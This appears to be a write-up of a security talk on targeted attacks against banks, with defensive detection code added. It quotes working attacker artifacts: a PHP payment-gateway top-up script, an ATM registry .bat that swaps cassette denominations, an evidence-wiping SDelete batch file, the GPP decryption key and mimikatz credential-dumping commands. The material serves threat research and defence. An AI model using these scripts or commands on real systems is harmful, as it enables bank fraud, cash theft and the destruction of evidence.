
Hackers want your bank more than your customers



The speaker walks case by case through several incidents involving ATMs, payment gateways, card processing and interbank transfer systems, describes the tactics attackers from different countries use to gain access to a bank's local network, and explains the techniques they use to escalate privileges once inside. He shows the mistakes attackers make, how to spot their activity, and how to stop them from taking the bank's infrastructure down or stealing money. The audience learns who will attack financial institutions in the future, what tools they will use, and how they will cover their tracks.



  1. Hackers want your bank more than your customers: The evolution of targeted attacks on financial institutions (GROUP-IB.COM)
  2. Who are the attackers?
  3. Timeline (chart only). *Cobalt was detected in June
  4. Who are they? What are their favorite targets?
     KNOWN TARGETED ATTACKERS:
     • Buhtrap: ARM CBR (SWIFT analog)
     • Cobalt: ATM, card processing, SWIFT
     • Corkow: trading terminals, card processing, ATM
     • Anunak: internet banking, ARM CBR, SWIFT, payment gateways, card processing, ATM
     • Lurk: ARM CBR (SWIFT analog)
  5. FUTURE TARGETED ATTACKERS: Toplel, Ranbyus, RTM, Vawtrak, Dridex
     Notes on compromised accounts quoted on the slide:
     • "Balance is 500 thousand pounds, inter-UK, for money mules (no such money mules now). Skip for now."
     • "Account for authorization of payments, balance is 2 million pounds. No function of payment approval."
     • "Balance is 18 million pounds. Tried to transfer 2 million to China."
     • "Balance is 15 million pounds, dual authorization off. No opportunity to establish sort code for transfer. It is better to ring out."
     Future attackers are after your network.
  6. What are the targets?
  7. Targets: Corporate internet banking software
     • Compromise the operator workstations that manage corporate accounts
     • List companies with high balances
     • Generate new digital signatures for each company
     • Sign transactions from the corporate accounts with the new digital signatures
     Access to corporate internet banking lets criminals steal from the bank's top clients. Anunak used this method in 2013-2014.
  8. Targets: Payment gateways
     • Once inside, hackers search for payment gateways
     • Obtain log files from the payment gateways to learn the typical message format
     • Start SOCKS proxies on internal hosts to reach the payment gateways
     • Run scripts that top up the attackers' phone balances in thousands of transactions
     • Transfer the money from the phones to cards and cash out
     Payment gateways enable high-frequency, low-amount transfers, which are very hard to stop and reverse.
     Attacker script shown on the slide (PHP; the gateway host in $url is truncated on the slide and the dealer identifiers are masked):

```php
<?php
// Attacker top-up script as shown on the slide. SESSION is just a timestamp;
// NUMBER is the phone to top up, AMOUNT the value of one top-up.
$ses = date("Ymdhis");
$url = "…bin/DealerSertification/de_pay.cgi";   // host truncated on the slide
$data_string = "SD=XXXXXX&AP=XXXXXX&OP=XXXXX&SESSION=" . $ses
    . "&COMMENT=Test&NUMBER=9642065662&AMOUNT_ALL=10.0&AMOUNT=10.0";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Note: this Content-Length covers $data_string only, not the inputmessage
// prefix added below; the script is reproduced as found.
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'Content-Length: ' . strlen($data_string)));
// Gateway-specific "inputmessage" record (format learned from the stolen logs)
curl_setopt($ch, CURLOPT_POSTFIELDS,
    "inputmessage=0000038801SM000001270000012700000125&" . $data_string);
$result = curl_exec($ch);
var_dump($result);
```
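     The scripted top-ups described above leave a pattern in the gateway's own logs: many low-value requests seconds apart, to a handful of phone numbers, from an internal host that is not a gateway front end. The Python below is an added detection example (not Group-IB's code and not the attacker's): it runs a sliding-window count over constructed log lines whose format is an assumption, and separately flags sources outside an assumed allowlist of front-end hosts.

```python
"""Spot the gateway-abuse pattern in constructed gateway logs.

Added example, not Group-IB's code. The log format (one line per request with
timestamp, source IP, operation, NUMBER and AMOUNT) is a constructed stand-in
for whatever the gateway actually writes; the field names mirror the POST
parameters in the attacker's script.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) op=(?P<op>\S+) "
    r"NUMBER=(?P<number>\d+) AMOUNT=(?P<amount>[\d.]+)$"
)

# Hosts that are supposed to talk to the gateway (assumed front-end servers).
ALLOWED_SOURCES = {"10.20.1.55", "10.20.1.80"}


def constructed_log():
    """Constructed sample (not real data): three customer top-ups plus a burst
    of 40 small top-ups, one per second, from a single internal host that is
    not a gateway front end, cycling over four attacker-controlled numbers."""
    base = datetime(2016, 6, 14, 10, 0, 0)
    lines = [
        f"{base.isoformat()} src=10.20.1.55 op=de_pay NUMBER=9161234567 AMOUNT=500.0",
        f"{(base + timedelta(seconds=30)).isoformat()} src=10.20.1.80 op=de_pay NUMBER=9167654321 AMOUNT=300.0",
        f"{(base + timedelta(seconds=90)).isoformat()} src=10.20.1.55 op=de_pay NUMBER=9161234567 AMOUNT=10.0",
    ]
    phones = ["9642065662", "9642065663", "9642065664", "9642065665"]
    for i in range(40):
        ts = base + timedelta(seconds=5 + i)
        lines.append(f"{ts.isoformat()} src=10.20.7.12 op=de_pay NUMBER={phones[i % 4]} AMOUNT=10.0")
    return lines


def parse(line):
    """Parse one log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"], "op": m["op"],
            "number": m["number"], "amount": float(m["amount"])}


def detect_bursts(lines, window=timedelta(seconds=60), min_count=20, max_amount=50.0):
    """Sliding window per source host over small-amount requests.

    Returns {src: {"count": n, "numbers": [...]}} for every source that issued
    at least min_count requests of at most max_amount inside one window; count
    is the largest window seen, numbers the distinct NUMBER values in it."""
    events = sorted((e for e in map(parse, lines) if e), key=lambda e: e["ts"])
    recent = defaultdict(deque)
    alerts = {}
    for e in events:
        if e["amount"] > max_amount:
            continue
        q = recent[e["src"]]
        q.append(e)
        while e["ts"] - q[0]["ts"] > window:
            q.popleft()
        if len(q) >= min_count and len(q) > alerts.get(e["src"], {"count": 0})["count"]:
            alerts[e["src"]] = {"count": len(q),
                                "numbers": sorted({x["number"] for x in q})}
    return alerts


def unexpected_sources(lines, allowed=ALLOWED_SOURCES):
    """Internal hosts talking to the gateway that are not known front ends
    (the SOCKS proxy the attackers start lives on such a host)."""
    return {e["src"] for e in map(parse, lines) if e and e["src"] not in allowed}
```

     The allowlist check is the cheaper of the two and catches the proxy host regardless of amounts; the burst check is what you would tune against the gateway's real traffic profile, since legitimate retail top-ups are also small but are not clustered per source.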
  9. Targets: ATM
     • Hackers identify the ATM manufacturers
     • They detect the physical ATM locations
     • Upload tools from the internal network to the ATM
     • Jackpot with diagnostic tools
     • Jackpot with custom malicious programs for specific ATMs
     ATM heists are the easiest way to launder money. Cobalt used malware to withdraw bags of cash totalling $2.6m from 41 ATMs in Taiwan.
  10. Targets: Trade terminals
     • The attack lasted only 14 minutes
     • $437 million in purchases (5 trades)
     • $97 million sold (2 trades)
     • The exchange rate swung between 55 and 66 rubles
     Corkow conducted the first successful attack on broker terminals in 2015.
  11. Targets: Trade terminals (chart only)
  12. Targets: ARM CBR or SWIFT
     Working directories (path separators were lost in extraction and are restored here):
     SWIFT:
       [ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcm\in
       [ROOT_DRIVE]:\Users\Administrator\AppData\Local\Allians\mcm\out
     ARM CBR:
       [ROOT_DRIVE]:\uarm3\exq\inc
       [ROOT_DRIVE]:\uarm3\exq\out
     • Identify the working directory of the SWIFT or ARM CBR application
     • Replace payment details with the fraudster's information
     • Intercept confirmation messages so the fraudulent transactions are not identified
  13. Targets: Card processing
     • Legally open cards at the same bank, or buy new cards on the dark market (usually about 30 cards)
     • Remove or increase withdrawal limits
     • Remove overdraft limits (even for debit cards)
     • Cash out with these cards in other countries
     Cobalt, Corkow and Anunak have been conducting these attacks since 2014. It gives them a very important cash-out advantage.
  14. Malware delivery
  15. Malware delivery: Drive-by
     GROUPS WHICH HAVE USED THIS METHOD: Anunak, Corkow, Buhtrap, Lurk
     800 000+ total visitors per day; 11% average exploit success rate; 90 000 possible infections per day
  16. Malware delivery: Custom pay-per-install
     GROUPS WHICH HAVE USED THIS METHOD: Anunak
     WHAT THEY DID:
     • Contact a botnet owner
     • Ask for the IPs of the infected machines
     • Check the IP list with a script (below)
     • Look for records related to financial institutions
     • Ask the botnet owner to install the new trojan on those machines
     Script shown on the slide (bulk WHOIS lookup through Shadowserver using the bulkwhois package; ip.txt holds one address per line):

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
from bulkwhois.shadowserver import BulkWhoisShadowserver

iplist_file = 'ip.txt'   # infected-host IPs supplied by the botnet owner
path = os.path.dirname(os.path.abspath(__file__))
bulk_whois = BulkWhoisShadowserver()

iplist = []
with open(os.path.join(path, iplist_file)) as f:
    for line in f:
        iplist.append(line.strip())

# Dict keyed by IP; each record carries cc / org_name / register / as_name / bgp_prefix
result = bulk_whois.lookup_ips(iplist)

with open(os.path.join(path, 'data.txt'), 'a') as f:
    for record in result:
        f.write('IP: %s CC: %s Org. Name: %s Register: %s AS Name: %s BGP Prefix: %s\n'
                '-------------------------------------------------------\n'
                % (result[record]['ip'], result[record]['cc'],
                   result[record]['org_name'], result[record]['register'],
                   result[record]['as_name'], result[record]['bgp_prefix']))
```

     The org_name and as_name fields are what the attackers grep for bank names; the same lookup is useful defensively for checking whether your own address space shows up in a sinkhole or botnet feed.
  17. Malware delivery: Web hack
     GROUPS WHICH HAVE USED THIS METHOD: Anunak and individual hackers in 2013, 2014 and 2015
     WHAT THEY DO:
     • Identify an SQL injection
     • Use EXEC in the SQL request to gather information about the network environment
     • Write files to the server with the echo command and download Meterpreter from a remote host
     • Upload mimikatz to the domain controller
     • Create hidden tunnels
  18. Malware delivery: Phishing emails
     GROUPS WHICH HAVE USED THIS METHOD: Anunak, Buhtrap, Lurk, Cobalt, MoneyTaker
     METHODS TO ENSURE DOCUMENTS ARE OPENED:
     • Mass mailing to corporate email addresses
     • Calls to bank managers
     • Hacking bank clients
     • Hacking bank partners
     ATTACHMENTS:
     • Executables
     • Executables in an encrypted archive
     • Documents with exploits
     • Documents with malicious macros
  19. Malware delivery: Spear phishing with a faked sender address
     ADVANTAGES:
     • Easy to start
     • Unlimited list of brands to impersonate
     • No need to register domains
     • Fewer traces for the investigation
     • High level of trust from users
     • Hard to detect once the email reaches the end user
     DISADVANTAGES:
     • Does not pass the Sender Policy Framework (SPF) check
     • Low delivery percentage
  20. Malware delivery: Spear phishing from a registered look-alike domain
     ADVANTAGES:
     • Can pass the Sender Policy Framework (SPF) check, because the attackers publish the SPF record for the domain they registered
     • New TLDs allow registering very similar domains
     • High delivery percentage
     DISADVANTAGES:
     • Vigilant users can detect it
     • Additional traces for the investigation
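     Slides 19 and 20 turn on one mechanism: SPF is evaluated against the sender's domain, so a forged address at the real partner's domain fails, while a look-alike domain whose DNS the attackers control passes. The Python below is an added example (not Group-IB's code) that evaluates a small RFC 7208 subset (ip4/ip6/include/all) over constructed DNS records for reserved example domains and RFC 5737 test addresses, and adds the complementary look-alike check that catches what SPF cannot.

```python
"""Why a forged sender address fails SPF while a registered look-alike passes.

Added example, not Group-IB's code. Domains, DNS records and addresses are
constructed; the evaluator covers only ip4/ip6/include/all, which is enough to
demonstrate the two delivery techniques.
"""
import ipaddress

# Constructed DNS TXT records. bank-partner.example is the real partner;
# bank-partner.top is a look-alike the attackers registered themselves.
DNS_TXT = {
    "bank-partner.example": "v=spf1 ip4:203.0.113.0/24 include:mail-provider.example -all",
    "mail-provider.example": "v=spf1 ip4:198.51.100.10 ~all",
    "bank-partner.top": "v=spf1 ip4:192.0.2.5 -all",
}
ATTACKER_IP = "192.0.2.5"          # constructed attacker mail server
KNOWN_PARTNERS = ["bank-partner.example"]

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(mail_from_domain, sender_ip, dns=DNS_TXT, depth=0):
    """Evaluate the SPF record of the envelope sender's domain for sender_ip."""
    record = dns.get(mail_from_domain)
    if record is None or not record.startswith("v=spf1"):
        return "none"
    if depth > 10:                      # include: loop protection
        return "permerror"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        mech, _, value = term.partition(":")
        if mech in ("ip4", "ip6"):
            matched = ip in ipaddress.ip_network(value, strict=False)
        elif mech == "include":
            matched = check_spf(value, sender_ip, dns, depth + 1) == "pass"
        elif mech == "all":
            matched = True
        else:
            return "permerror"          # a/mx/ptr/exists need live DNS, not modelled
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"


def edit_distance(a, b):
    """Levenshtein distance (Wagner-Fischer, single row)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain, known=KNOWN_PARTNERS, max_distance=1):
    """Return the known partner domain that `domain` imitates (second-level
    label identical or one edit away, e.g. same name under a new TLD), or None
    when the domain is itself a known partner or unrelated. Assumes domains
    have at least two labels."""
    if domain in known:
        return None
    label = domain.split(".")[-2]
    for k in known:
        if edit_distance(label, k.split(".")[-2]) <= max_distance:
            return k
    return None


def classify(mail_from_domain, sender_ip):
    """What a mail gateway would record for one message: SPF result plus the
    look-alike comparison against the partner list."""
    return {"spf": check_spf(mail_from_domain, sender_ip),
            "lookalike_of": lookalike_of(mail_from_domain)}
```

     The forged address fails because the partner's record ends in -all and the attacker's server is in neither the partner's nor its provider's range; the look-alike passes cleanly, and only the name comparison against the partner list flags it, which is why the slide lists "vigilant users" as the remaining defence.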
  21. Malware delivery: Spear phishing from a compromised partner
     ADVANTAGES:
     • Almost 100% delivery with a correct attachment
     • High percentage of opening by users from the partner's contact list
     • No need to rent a server or register domains
     DISADVANTAGES:
     • Limited to the region where the partner is located
  22. Tools to create malicious documents: Microsoft Word Intruder (MWI); OffensiveWare Multi Exploit Builder (OMEB)
  23. The attack scheme (figure only)
  24. What they do inside your network
  25. Legal software vs. private tools
     New trend: hackers use legal software for their attacks. Legal attack frameworks have become very effective; special trojans are no longer necessary.
     PRIVATE TOOLS, advantages:
     • Unknown before the first public research
     • Adjusted to the needs of the group
     • Easy to use
     • Inexperienced attackers can be involved
     PRIVATE TOOLS, disadvantages:
     • Investment in development is needed
     • High cost of ownership
     • Becomes known quickly
     • Dependency on the developers
     • Attracts attention
     • Easier to attribute incidents and threat actors
     • Simplifies the investigation
     LEGAL SOFTWARE, advantages:
     • Hard to track such attacks
     • Difficult to link different incidents
     • Fewer traces to investigate
     • Difficult to detect in a local network
     LEGAL SOFTWARE, disadvantages:
     • Requires higher qualification
     • Many solutions are DIY
     • Difficult to attack several targets simultaneously
  26. KSC as a tool for provisioning the malware (figure only)
  27. KSC as a tool for provisioning the RMS and the scanning server (figure only)
  28. Gaining privileges: DOMAIN CONTROLLER CONFIGURATION ERROR
     • Group Policy Preferences (GPP)
     • \\[server_name]\sysvol\[domain_name]\Policies\[group_policy_name]\Machine\Preferences\Groups\Groups.xml
     • The perpetrators extract domain administrator credentials from the cpassword and userName fields of Groups.xml (the password is encrypted with AES-256 and then Base64-encoded).
     • To recover the plaintext, the attackers first Base64-decode the value.
     • They then decrypt it with the key 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b, which Microsoft published in the GPP protocol documentation, so anyone who can read SYSVOL (every domain user) can recover the password.
  29. Gaining privileges: MIMIKATZ
     If the attackers have access to a domain controller: mimikatz sekurlsa::logonpasswords
     If the attackers have local administrator privileges but no access to a domain controller: they connect to workstations and servers looking for a logged-on user who has access to the domain controller. A pass-the-hash attack can then be performed.
  30. Gaining privileges: MIMIKATZ
     If the attackers do not have local administrator rights: exploiting the operating system vulnerabilities CVE-2014-4113, CVE-2015-1701, CVE-2015-2363 and CVE-2015-2426 gives the criminals SYSTEM-level privileges on x86 and x64 systems. The malware connects to hosts and checks them for the necessary vulnerabilities.
     MIMIKATZ GOLDEN TICKET
     • "privilege::debug" "lsadump::samrpc /patch" exit (as quoted on the slide)
     • Extract the NTLM hash of the krbtgt account (Key Distribution Center Service Account)
     • Create a file with a golden TGT ticket
  31. Tools to research the network
     • netscan.exe: a network scanner (NetScan)
     • patch86.exe: a Termsrv patch enabling simultaneous terminal sessions (KEY indicator)
     • plink.exe: an SSH console client for Windows
     • psexec.exe: a remote console for Windows
  32. Tools to research the network
     REMOTE ADMINISTRATION TOOLS:
     • AmmyAdmin
     • TeamViewer or TVRat
     • LogMeIn Hamachi
     • RMS
     • LightManager
     • HiddenVNC
     • Hidden channel over SMB, DNS or HTTPS
  33. Ensuring the trojan's survivability (figure only)
  34. Tools used to complete attacks
  35. Change the denomination of the banknotes withdrawn
     • Remote access to the ATM from the internal network
     • Launch a .bat script that changes registry keys
     • A money mule comes to the ATM and withdraws cash from his own bank account
     • During the withdrawal he selects small denominations
     • Instead of small denominations the ATM dispenses large denominations from the wrong cassette
     Dispenser configuration (registry value: denomination): VALUE_1: 5000, VALUE_2: 1000, VALUE_3: 500, VALUE_4: 100
     .bat file from the ATM (path separators restored). The last two REG ADD lines overwrite VALUE_1 and VALUE_4, swapping the 5000 and 100 cassettes; the forced reboot makes the dispenser reload the configuration:

```bat
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "5000" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_2 /t REG_SZ /d "1000" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_3 /t REG_SZ /d "500" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "5000" /f
shutdown -r -t 0 -f
```
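     The .bat above is small enough to reason about by hand, but the check a practitioner wants is mechanical: replay the REG ADD lines, take the final state of the dispenser key, and compare it with the cassette configuration of record. The Python below is an added example (not Group-IB's code); the script text is the slide's with separators restored, and the baseline is the legitimate configuration the slide lists.

```python
"""Replay an ATM registry .bat and compare the result with the cassette
configuration of record.

Added example, not Group-IB's code. ATM_BAT is the slide's script with path
separators restored; BASELINE is the legitimate configuration from the slide.
"""
import re

DISPENSER_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas"
                 r"\CurrentVersion\LYNXPAR\CASH_DISPENSER")

# Legitimate configuration: cassette 1 holds the largest notes, cassette 4 the smallest.
BASELINE = {"VALUE_1": "5000", "VALUE_2": "1000", "VALUE_3": "500", "VALUE_4": "100"}

ATM_BAT = r"""REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "5000" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_2 /t REG_SZ /d "1000" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_3 /t REG_SZ /d "500" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "5000" /f
shutdown -r -t 0 -f
"""

REG_ADD_RE = re.compile(
    r'^REG\s+ADD\s+"(?P<key>[^"]+)"\s+/v\s+(?P<name>\S+)\s+/t\s+(?P<type>\S+)'
    r'\s+/d\s+"(?P<data>[^"]*)"', re.IGNORECASE)


def simulate_reg_adds(script):
    """Apply REG ADD lines in order (a later write to the same value wins) and
    count reboot commands. Returns ({(key, VALUE_NAME): data}, reboots)."""
    state, reboots = {}, 0
    for line in script.splitlines():
        m = REG_ADD_RE.match(line.strip())
        if m:
            state[(m["key"], m["name"].upper())] = m["data"]
        elif line.strip().lower().startswith("shutdown"):
            reboots += 1
    return state, reboots


def cassette_deviations(state, key=DISPENSER_KEY, baseline=BASELINE):
    """{VALUE_n: (expected, actual)} for every cassette whose configured
    denomination differs from the configuration of record."""
    return {name: (expected, state.get((key, name)))
            for name, expected in baseline.items()
            if state.get((key, name)) != expected}


def is_cassette_swap(deviations):
    """True when denominations were permuted rather than invented: the same
    notes are present, only their assignment to cassettes moved. That is the
    signature of the trick on the slide, as opposed to a mistyped value."""
    if not deviations:
        return False
    expected = sorted(e for e, _ in deviations.values())
    actual = sorted(str(a) for _, a in deviations.values())
    return expected == actual
```

     On a real fleet the same comparison runs against the live registry (exported with reg query) rather than a recovered script, and any deviation, swap or not, should block the ATM from dispensing until the cassette inventory is reconciled.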
  36. Modified diagnostic tools
     • The attackers disabled the KDIAG function responsible for checking whether the door is open
     • Uploaded the modified KDIAG to the ATM and sent the command to dispense cash
     • At the same time a money mule stood at the ATM with an open bag to grab the money
  37. Software for attacks on ATMs
     A malicious program that uses the standard XFS (eXtensions for Financial Services) interface through the XFS Manager. Its parameters:
     • ServiceLogicalName: the service name passed to WFSOpen (for example, "Cash Dispenser Module")
     • Cassettes Count: total number of cassettes in the device (1 to 15)
     • Cassette Number: the cassette that should dispense cash (1 to 15)
     • Banknotes Count: number of banknotes to dispense from the cassette (1 to 60)
     • Dispenses Count: how many times the dispense should be repeated (1 to 60)
  38. Outward Telegraphic Transfer Comm & Charges
     MD5 6D355FFA06AE39FC8671CC8AC38F984E
     Searches files in the directory D:\WIN32APP\SWIFTALLIANCE\SERVER\Batch\Outgoing\HK\HKAcks\Bak (separators restored). Here "Outgoing" denotes outgoing transactions and "HK" Hong Kong, so the program looks for transactions to Hong Kong banks.
     If a file is bigger than 102400 bytes it appends "Too big file <file name> : <file size> > 102400\r\n" to the log C:\Temp\Msglog.txt; otherwise it opens the file and searches for the substrings OTTC605384, OTTC605385, OTTC601386, OTTC601387, OTTC605381, OTTC605382 (identifiers of a Hong Kong-based FI).
     If a file contains one of these substrings, it writes "Found file: %s with required token: <found substring>\r\n" to the log and copies the file into the directory C:\Temp\Msg.
     It then sleeps for 2.5 seconds and repeats the search.
  39. ARM CBR (SWIFT analogue): MONEYTAKER v5.0
     Four modules:
     • Main: launches the other modules with parameters from the main config file
     • AutoReplacer (XmlBin): replaces payment details in the ARM CBR directory and writes the result of each replacement to the Xml-Resultfile. It does not change the SUM field, to avoid detection.
     • Hiding (EdBin): checks incoming/confirmation messages; compares the PayeePersonalAcc field with HackAcc from the Xml-Resultfile. If the values match, it restores the original PayeePersonalAcc, so the confirmation the operator sees matches the payment that was originally entered.
     • Temp (TxtBin): purpose unknown
     Xml-Resultfile fields: Id, OrigAcc, OrigBic, OrigCor, Purpose, HackAcc, HackBic, HackCor, Sum, PayerPersonalAcc
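     The two modules above defeat two common controls at once: keeping Sum intact defeats a totals check, and restoring the payee in the confirmation defeats reconciliation based on what comes back. The Python below is an added example (not MoneyTaker's code and not Group-IB's) that simulates both modules on constructed payment orders and runs three reconciliations, showing that only a field-level comparison between the bank's own copy of the orders and what actually sits in the ARM CBR outgoing directory catches the swap. The core_banking_orders() source and all account numbers, BICs and sums are constructed.

```python
"""Simulate the AutoReplacer / Hiding pair and test which reconciliation sees it.

Added example, not MoneyTaker's code and not Group-IB's. Payment orders are
dicts using the field names the slide lists; account numbers, BICs, sums and
the hypothetical core_banking_orders() source are constructed.
"""

PAYEE_FIELDS = ("PayeePersonalAcc", "PayeeBic", "PayeeCorAcc")


def core_banking_orders():
    """Constructed sample: the bank's own copy of two outgoing payment orders,
    taken before the files reach the ARM CBR outgoing directory."""
    return [
        {"Id": "1", "PayerPersonalAcc": "40702810900000000001",
         "PayeePersonalAcc": "40702810400000000777", "PayeeBic": "044525225",
         "PayeeCorAcc": "30101810400000000225", "Sum": "1500000.00",
         "Purpose": "Payment under contract 17/2016"},
        {"Id": "2", "PayerPersonalAcc": "40702810900000000001",
         "PayeePersonalAcc": "40817810000000000123", "PayeeBic": "044525593",
         "PayeeCorAcc": "30101810200000000593", "Sum": "12000.00",
         "Purpose": "Salary"},
    ]


def auto_replacer(orders, hack_acc, hack_bic, hack_cor, min_sum=100000.0):
    """Rewrite payee details of orders worth at least min_sum, leave Sum alone
    (as the slide notes), and record each swap the way the Xml-Resultfile does."""
    outgoing, results = [], []
    for order in orders:
        o = dict(order)
        if float(o["Sum"]) >= min_sum:
            results.append({
                "Id": o["Id"], "OrigAcc": o["PayeePersonalAcc"], "OrigBic": o["PayeeBic"],
                "OrigCor": o["PayeeCorAcc"], "Purpose": o["Purpose"], "HackAcc": hack_acc,
                "HackBic": hack_bic, "HackCor": hack_cor, "Sum": o["Sum"],
                "PayerPersonalAcc": o["PayerPersonalAcc"]})
            o.update(PayeePersonalAcc=hack_acc, PayeeBic=hack_bic, PayeeCorAcc=hack_cor)
        outgoing.append(o)
    return outgoing, results


def hiding(confirmations, results):
    """For each confirmation whose PayeePersonalAcc equals the recorded HackAcc
    of the same order, put the original payee details back."""
    by_id = {r["Id"]: r for r in results}
    restored = []
    for conf in confirmations:
        c = dict(conf)
        r = by_id.get(c["Id"])
        if r and c["PayeePersonalAcc"] == r["HackAcc"]:
            c.update(PayeePersonalAcc=r["OrigAcc"], PayeeBic=r["OrigBic"],
                     PayeeCorAcc=r["OrigCor"])
        restored.append(c)
    return restored


def reconcile(originals, observed, fields):
    """Field-level comparison keyed by Id; returns (Id, field, original, observed)
    for every difference."""
    by_id = {o["Id"]: o for o in observed}
    return [(orig["Id"], f, orig[f], by_id[orig["Id"]][f])
            for orig in originals if orig["Id"] in by_id
            for f in fields if by_id[orig["Id"]][f] != orig[f]]


def run_scenario():
    """Three reconciliations a bank might run, on the same attack."""
    originals = core_banking_orders()
    outgoing, results = auto_replacer(originals, "40817810099999999999",
                                      "044525999", "30101810000000000999")
    # Confirmations echo the outgoing payee details; Hiding rewrites them before
    # the operator sees them.
    confirmations = hiding([dict(o) for o in outgoing], results)
    return {
        "sum_only": reconcile(originals, outgoing, ["Sum"]),
        "confirmations": reconcile(originals, confirmations, PAYEE_FIELDS),
        "outgoing_dir": reconcile(originals, outgoing, PAYEE_FIELDS),
    }
```

     The practical consequence: the comparison has to read the transport directory itself (or a signed copy made at the moment the order leaves core banking), on a host the ARM CBR operator workstation cannot write to, because anything that flows back through that workstation can be edited by the Hiding module.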
  40. Software to clean evidence
     DEL.BAT:

```bat
sdelete.exe -accepteula -p 32 d2.exe
sdelete.exe -accepteula -p 32 xtl.exe
sdelete.exe -accepteula -p 32 *.txt
sdelete.exe -accepteula -p 32 d2s.exe
del sdelete.exe
del del.bat
```

     The del.bat script launches SDelete, which overwrites files (here with 32 passes) so that they cannot be recovered in a forensic investigation, then deletes SDelete and itself.
     MBR KILLER: a program that deletes the Master Boot Record (MBR).
  41. Future
     • More criminal groups: targeted attacks are a new calling for attackers who understand banks and money laundering
     • More attacks: the global landscape and ready-to-use tools, techniques and tactics let attackers be more effective
     • Legal software: we will see many more attacks that use legitimate software without private trojans
     • Harder to attribute and investigate: legitimate software in attacks will force us to change attribution and investigation procedures